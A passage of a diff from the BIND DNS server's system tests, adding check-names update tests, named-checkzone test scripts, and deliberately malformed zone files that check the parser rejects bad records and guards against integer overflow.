dig.out.ns1.test$n || ret=1 +grep "xxx_xxx.fail.update/A: bad owner name (check-names)" ns1/named.run > /dev/null || ret=1 +grep NXDOMAIN dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "check that updates to 'check-names warn;' succeed and are logged ($n)" +ret=0 +$NSUPDATE -d <<END > nsupdate.out.test$n 2>&1|| ret=1 +check-names off +server 10.53.0.1 ${PORT} +update add xxx_xxx.warn.update. 600 A 10.10.10.1 +send +END +$DIG $DIGOPTS xxx_xxx.warn.update @10.53.0.1 A > dig.out.ns1.test$n || ret=1 +grep "xxx_xxx.warn.update/A: bad owner name (check-names)" ns1/named.run > /dev/null || ret=1 +grep NOERROR dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "check that updates to 'check-names ignore;' succeed and are not logged ($n)" +ret=0 +not=1 +$NSUPDATE -d <<END > nsupdate.out.test$n 2>&1 || ret=1 +check-names off +server 10.53.0.1 ${PORT} +update add xxx_xxx.ignore.update. 600 A 10.10.10.1 +send +END +grep "xxx_xxx.ignore.update/A.*(check-names)" ns1/named.run > /dev/null || not=0 +if [ $not != 0 ]; then ret=1; fi +$DIG $DIGOPTS xxx_xxx.ignore.update @10.53.0.1 A > dig.out.ns1.test$n || ret=1 +grep NOERROR dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "check that updates to 'check-names primary ignore;' succeed and are not logged ($n)" +ret=0 +not=1 +$NSUPDATE -d <<END > nsupdate.out.test$n 2>&1 || ret=1 +check-names off +server 10.53.0.4 ${PORT} +update add xxx_xxx.primary-ignore.update. 600 A 10.10.10.1 +send +END +grep "xxx_xxx.primary-ignore.update/A.*(check-names)" ns4/named.run > /dev/null || not=0 +if [ $not != 0 ]; then ret=1; fi +$DIG $DIGOPTS xxx_xxx.primary-ignore.update @10.53.0.4 A > dig.out.ns4.test$n || ret=1 +grep NOERROR dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "check that updates to 'check-names master ignore;' succeed and are not logged ($n)" +ret=0 +not=1 +$NSUPDATE -d <<END > nsupdate.out.test$n 2>&1 || ret=1 +check-names off +server 10.53.0.5 ${PORT} +update add xxx_xxx.master-ignore.update. 600 A 10.10.10.1 +send +END +grep "xxx_xxx.master-ignore.update/A.*(check-names)" ns5/named.run > /dev/null || not=0 +if [ $not != 0 ]; then ret=1; fi +$DIG $DIGOPTS xxx_xxx.master-ignore.update @10.53.0.5 A > dig.out.ns5.test$n || ret=1 +grep NOERROR dig.out.ns5.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) +n=$((n+1)) + +echo_i "check that updates to 'check-names secondary ignore;' succeed and are not logged ($n)" +ret=0 +# takes a while for the transfer to succeed as ns5 (primary) is started after ns4 (secondary) +# and the zone is still loading when we get to this point. +retry_quiet 35 wait_for_record xxx_xxx.master-ignore.update @10.53.0.4 A dig.out.ns4.test$n || ret=1 +grep "xxx_xxx.master-ignore.update/A.*(check-names)" ns4/named.run > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "check that updates to 'check-names master ignore;' succeed and are not logged ($n)" +ret=0 +retry_quiet 35 wait_for_record xxx_xxx.primary-ignore.update @10.53.0.5 A dig.out.ns5.test$n || ret=1 +grep "xxx_xxx.primary-ignore.update/A.*(check-names)" ns5/named.run > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) +n=$((n+1)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/checkzone/clean.sh b/bin/tests/system/checkzone/clean.sh new file mode 100644 index 0000000..a02fc64 --- /dev/null +++ b/bin/tests/system/checkzone/clean.sh @@ -0,0 +1,16 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f test.* good1.db.map good1.db.raw named-compilezone +rm -f ns*/named.lock +rm -f zones/bad-tsig.db diff --git a/bin/tests/system/checkzone/setup.sh b/bin/tests/system/checkzone/setup.sh new file mode 100644 index 0000000..f8b464a --- /dev/null +++ b/bin/tests/system/checkzone/setup.sh @@ -0,0 +1,24 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +ln -s $CHECKZONE named-compilezone + +./named-compilezone -D -F raw -o good1.db.raw example \ + zones/good1.db > /dev/null 2>&1 +./named-compilezone -D -F map -o good1.db.map example \ + zones/good1.db > /dev/null 2>&1 + +copy_setports zones/bad-tsig.db.in zones/bad-tsig.db diff --git a/bin/tests/system/checkzone/tests.sh b/bin/tests/system/checkzone/tests.sh new file mode 100644 index 0000000..0b0e822 --- /dev/null +++ b/bin/tests/system/checkzone/tests.sh @@ -0,0 +1,200 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=1 + +for db in zones/good*.db +do + echo_i "checking $db ($n)" + ret=0 + case $db in + zones/good-gc-msdcs.db|zones/good-spf-exception.db) + $CHECKZONE -k fail -i local example $db > test.out.$n 2>&1 || ret=1 + ;; + zones/good-dns-sd-reverse.db) + $CHECKZONE -k fail -i local 0.0.0.0.in-addr.arpa $db > test.out.$n 2>&1 || ret=1 + ;; + *) + $CHECKZONE -i local example $db > test.out.$n 2>&1 || ret=1 + ;; + esac + n=$((n+1)) + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +done + +for db in zones/bad*.db +do + echo_i "checking $db ($n)" + ret=0 v=0 + case $db in + zones/bad-dns-sd-reverse.db|zones/bad-svcb-servername.db) + $CHECKZONE -k fail -i local 0.0.0.0.in-addr.arpa $db > test.out.$n 2>&1 || v=$? + ;; + *) + $CHECKZONE -i local example $db > test.out.$n 2>&1 || v=$? + ;; + esac + test $v = 1 || ret=1 + n=$((n+1)) + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +done + +echo_i "checking with journal file ($n)" +ret=0 +$CHECKZONE -D -o test.orig.db test zones/test1.db > /dev/null 2>&1 || ret=1 +$CHECKZONE -D -o test.changed.db test zones/test2.db > /dev/null 2>&1 || ret=1 +$MAKEJOURNAL test test.orig.db test.changed.db test.orig.db.jnl 2>&1 || ret=1 +jlines=$($JOURNALPRINT test.orig.db.jnl | wc -l) +[ $jlines = 3 ] || ret=1 +$CHECKZONE -D -j -o test.out1.db test test.orig.db > /dev/null 2>&1 || ret=1 +cmp -s test.changed.db test.out1.db || ret=1 +mv -f test.orig.db.jnl test.journal +$CHECKZONE -D -J test.journal -o test.out2.db test test.orig.db > /dev/null 2>&1 || ret=1 +cmp -s test.changed.db test.out2.db || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking with spf warnings ($n)" +ret=0 +$CHECKZONE example zones/spf.db > test.out1.$n 2>&1 || ret=1 +$CHECKZONE -T ignore example zones/spf.db > test.out2.$n 2>&1 || ret=1 +grep "'x.example' found type SPF" test.out1.$n > /dev/null && ret=1 +grep "'y.example' found type SPF" test.out1.$n > /dev/null || ret=1 +grep "'example' found type SPF" test.out1.$n > /dev/null && ret=1 +grep "'x.example' found type SPF" test.out2.$n > /dev/null && ret=1 +grep "'y.example' found type SPF" test.out2.$n > /dev/null && ret=1 +grep "'example' found type SPF" test.out2.$n > /dev/null && ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking with max ttl (text) ($n)" +ret=0 +$CHECKZONE -l 300 example zones/good1.db > test.out1.$n 2>&1 && ret=1 +$CHECKZONE -l 600 example zones/good1.db > test.out2.$n 2>&1 || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking with max ttl (raw) ($n)" +ret=0 +$CHECKZONE -f raw -l 300 example good1.db.raw > test.out1.$n 2>&1 && ret=1 +$CHECKZONE -f raw -l 600 example good1.db.raw > test.out2.$n 2>&1 || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking with max ttl (map) ($n)" +ret=0 +$CHECKZONE -f map -l 300 example good1.db.map > test.out1.$n 2>&1 && ret=1 +$CHECKZONE -f map -l 600 example good1.db.map > test.out2.$n 2>&1 || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking for no 'inherited owner' warning on '\$INCLUDE file' with no new \$ORIGIN ($n)" +ret=0 +$CHECKZONE example zones/nowarn.inherited.owner.db > test.out1.$n 2>&1 || ret=1 +grep "inherited.owner" test.out1.$n > /dev/null && ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking for 'inherited owner' warning on '\$ORIGIN + \$INCLUDE file' ($n)" +ret=0 +$CHECKZONE example zones/warn.inherit.origin.db > test.out1.$n 2>&1 || ret=1 +grep "inherited.owner" test.out1.$n > /dev/null || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking for 'inherited owner' warning on '\$INCLUDE file origin' ($n)" +ret=0 +$CHECKZONE example zones/warn.inherited.owner.db > test.out1.$n 2>&1 || ret=1 +grep "inherited.owner" test.out1.$n > /dev/null || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking that raw zone with bad class is handled ($n)" +ret=0 +$CHECKZONE -f raw example zones/bad-badclass.raw > test.out.$n 2>&1 && ret=1 +grep "failed: bad class" test.out.$n >/dev/null || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking that expirations that loop using serial arithmetic are handled ($n)" +ret=0 +q=-q +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking that nameserver below DNAME is reported even with occulted address record present ($n)" +ret=0 +$CHECKZONE example.com zones/ns-address-below-dname.db > test.out.$n 2>&1 && ret=1 +grep "is below a DNAME" test.out.$n >/dev/null || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking that delegating nameserver below DNAME is reported even with occulted address record present ($n)" +ret=0 +$CHECKZONE example.com zones/delegating-ns-address-below-dname.db > test.out.$n 2>&1 || ret=1 +grep "is below a DNAME" test.out.$n >/dev/null || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +ret=0 +echo_i "checking integer overflow is prevented in \$GENERATE ($n)" +$CHECKZONE -D example.com zones/generate-overflow.db > test.out.$n 2>&1 || ret=1 +lines=$(grep -c CNAME test.out.$n) +echo $lines +[ "$lines" -eq 1 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/checkzone/zones/.gitattributes b/bin/tests/system/checkzone/zones/.gitattributes new file mode 100644 index 0000000..a1b3cec --- /dev/null +++ b/bin/tests/system/checkzone/zones/.gitattributes @@ -0,0 +1 @@ +*.raw -text diff --git a/bin/tests/system/checkzone/zones/bad-badclass.raw b/bin/tests/system/checkzone/zones/bad-badclass.raw Binary files differnew file mode 100644 index 0000000..d8f1bf7 --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-badclass.raw diff --git a/bin/tests/system/checkzone/zones/bad-caa-rr.db b/bin/tests/system/checkzone/zones/bad-caa-rr.db Binary files differnew file mode 100644 index 0000000..fb7b861 --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-caa-rr.db diff --git a/bin/tests/system/checkzone/zones/bad-cdnskey.db b/bin/tests/system/checkzone/zones/bad-cdnskey.db new file mode 100644 index 0000000..d109423 --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-cdnskey.db @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +example. 0 SOA . . 0 0 0 0 0 +example. 0 NS . +example. 0 DNSKEY 257 3 10 AwEAAbqjg7xdvnU2Q/gtLw5LOfr5cDeTRjYuEbkzGrUiVSOSoxcTxuao WS/AFPQHuD8OSLiE/CeZ087JowREXl058rRfae8KMrveY17V0wmKs9N1 F1wf/hRDpXiThlRHWlskp8eSEEIqYrrHgWTesy/xDGIEOFM1gwRo0w8j KdRRJeL2hseTMa+m3rTzrYudUsI0BHLW8PiDUCbG5xgdee8/5YR4847i AAqHIiPJ1Z/IT53OIjMmtv5BUykZ8RYjlJxxX+C+dpRKiK73SQaR3hCB XAYOL9WsDp2/fpmEZpewavkMkdC+j2CX+z27MCS3ASO0AeKK0lcNXwND kgreE+Kr7gc= +example. 0 CDNSKEY 257 3 14 AwEAAbqjg7xdvnU2Q/gtLw5LOfr5cDeTRjYuEbkzGrUiVSOSoxcTXXXX WS/AFPQHuD8OSLiE/CeZ087JowREXl058rRfae8KMrveY17V0wmKs9N1 F1wf/hRDpXiThlRHWlskp8eSEEIqYrrHgWTesy/xDGIEOFM1gwRo0w8j KdRRJeL2hseTMa+m3rTzrYudUsI0BHLW8PiDUCbG5xgdee8/5YR4847i AAqHIiPJ1Z/IT53OIjMmtv5BUykZ8RYjlJxxX+C+dpRKiK73SQaR3hCB XAYOL9WsDp2/fpmEZpewavkMkdC+j2CX+z27MCS3ASO0AeKK0lcNXwND kgreE+Kr7gc= diff --git a/bin/tests/system/checkzone/zones/bad-cds.db b/bin/tests/system/checkzone/zones/bad-cds.db new file mode 100644 index 0000000..2ce4a0d --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-cds.db @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +example. 0 SOA . . 0 0 0 0 0 +example. 0 NS . +example. 0 DNSKEY 257 3 10 AwEAAbqjg7xdvnU2Q/gtLw5LOfr5cDeTRjYuEbkzGrUiVSOSoxcTxuao WS/AFPQHuD8OSLiE/CeZ087JowREXl058rRfae8KMrveY17V0wmKs9N1 F1wf/hRDpXiThlRHWlskp8eSEEIqYrrHgWTesy/xDGIEOFM1gwRo0w8j KdRRJeL2hseTMa+m3rTzrYudUsI0BHLW8PiDUCbG5xgdee8/5YR4847i AAqHIiPJ1Z/IT53OIjMmtv5BUykZ8RYjlJxxX+C+dpRKiK73SQaR3hCB XAYOL9WsDp2/fpmEZpewavkMkdC+j2CX+z27MCS3ASO0AeKK0lcNXwND kgreE+Kr7gc= +example. 0 CDS 14364 14 2 FD03B2312C8F0FE72C1751EFA1007D743C94EC91594FF0047C23C37CE119BA0B diff --git a/bin/tests/system/checkzone/zones/bad-dhcid.db b/bin/tests/system/checkzone/zones/bad-dhcid.db new file mode 100644 index 0000000..df36eb7 --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-dhcid.db @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 3600 DHCID +@ 3600 DHCID diff --git a/bin/tests/system/checkzone/zones/bad-dns-sd-reverse.db b/bin/tests/system/checkzone/zones/bad-dns-sd-reverse.db new file mode 100644 index 0000000..c766c8f --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-dns-sd-reverse.db @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +@ IN SOA . . 0 0 0 0 0 +@ IN NS . +; +; The following are *not* Service Discovery Prefixes from RFC 6763 and the +; PTR check-names rules for IN-ADDR.ARPA and IP6.ARPA do still apply. +; +b._fail._udp IN PTR !@#3. +db._wrong._udp IN PTR !@#3. +lb._dns-sd._tcp IN PTR !@#3. diff --git a/bin/tests/system/checkzone/zones/bad-ds.db b/bin/tests/system/checkzone/zones/bad-ds.db new file mode 100644 index 0000000..9363cb0 --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-ds.db @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +example. 0 SOA . . 0 0 0 0 0 +example. 0 NS . +example. 0 DNSKEY 257 3 10 AwEAAbqjg7xdvnU2Q/gtLw5LOfr5cDeTRjYuEbkzGrUiVSOSoxcTxuao WS/AFPQHuD8OSLiE/CeZ087JowREXl058rRfae8KMrveY17V0wmKs9N1 F1wf/hRDpXiThlRHWlskp8eSEEIqYrrHgWTesy/xDGIEOFM1gwRo0w8j KdRRJeL2hseTMa+m3rTzrYudUsI0BHLW8PiDUCbG5xgdee8/5YR4847i AAqHIiPJ1Z/IT53OIjMmtv5BUykZ8RYjlJxxX+C+dpRKiK73SQaR3hCB XAYOL9WsDp2/fpmEZpewavkMkdC+j2CX+z27MCS3ASO0AeKK0lcNXwND kgreE+Kr7gc= +example. 0 DS 14364 10 2 FD03B2312C8F0FE72C1751EFA1007D743C94EC91594FF0047C23C37CE119BA0C diff --git a/bin/tests/system/checkzone/zones/bad-eid.db b/bin/tests/system/checkzone/zones/bad-eid.db new file mode 100644 index 0000000..ba568ef --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-eid.db @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ EID +@ EID diff --git a/bin/tests/system/checkzone/zones/bad-generate-garbage.db b/bin/tests/system/checkzone/zones/bad-generate-garbage.db new file mode 100644 index 0000000..0d66e75 --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-generate-garbage.db @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +$GENERATE 0-7 host$ A 1.2.3.${1,0,dgarbagegarbage} diff --git a/bin/tests/system/checkzone/zones/bad-generate-missing-brace.db b/bin/tests/system/checkzone/zones/bad-generate-missing-brace.db new file mode 100644 index 0000000..314583e --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-generate-missing-brace.db @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +$GENERATE 0-7 host$ A 1.2.3.${1000 diff --git a/bin/tests/system/checkzone/zones/bad-generate-range.db b/bin/tests/system/checkzone/zones/bad-generate-range.db new file mode 100644 index 0000000..62a9e15 --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-generate-range.db @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +; 2147483647 + 1 overflows what can be represented in an 'int' +$GENERATE 1-1 host$ TXT foo${2147483647} diff --git a/bin/tests/system/checkzone/zones/bad-generate-tkey.db b/bin/tests/system/checkzone/zones/bad-generate-tkey.db new file mode 100644 index 0000000..8c05e51 --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-generate-tkey.db @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +$GENERATE 0-7 tkey$ TKEY "invalid.algorithm. 1516055980 1516140801 1 0 16 gRof8D2BFKvl/vrr9Lmnjw== 16 gRof8D2BFKvl/vrr9Lmnjw==" diff --git a/bin/tests/system/checkzone/zones/bad-nimloc.db b/bin/tests/system/checkzone/zones/bad-nimloc.db new file mode 100644 index 0000000..56d04c6 --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-nimloc.db @@ -0,0 +1,10 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership.
\ No newline at end of file diff --git a/bin/tests/system/checkzone/zones/bad-nsap-empty.db b/bin/tests/system/checkzone/zones/bad-nsap-empty.db new file mode 100644 index 0000000..fb8fdd0 --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-nsap-empty.db @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +; NSAP with an odd number of hex digits +example NSAP 0x47000580005a0000000001e133ffffff000161000 diff --git a/bin/tests/system/checkzone/zones/bad-nsap-odd-nibble.db b/bin/tests/system/checkzone/zones/bad-nsap-odd-nibble.db new file mode 100644 index 0000000..d287648 --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-nsap-odd-nibble.db @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +; empty NSAP address +example NSAP 0x diff --git a/bin/tests/system/checkzone/zones/bad-nsec3-padded.db b/bin/tests/system/checkzone/zones/bad-nsec3-padded.db new file mode 100644 index 0000000..8212bc4 --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-nsec3-padded.db @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +; The following NSEC3 RR is invalid as the Next Hashed Owner Name field +; is padded. See RFC 5155. +0p9mhaveqvm6t7vbl5lop2u3t2rp3tom NSEC3 1 1 12 aabbccdd ( + CPNMU=== MX DNSKEY NS + SOA NSEC3PARAM RRSIG ) diff --git a/bin/tests/system/checkzone/zones/bad-nsec3owner-padded.db b/bin/tests/system/checkzone/zones/bad-nsec3owner-padded.db new file mode 100644 index 0000000..bf3c5ab --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-nsec3owner-padded.db @@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +; The following NSEC3 RR owner is invalid as the owner name is padded. +CPNMU=== NSEC3 2 1 12 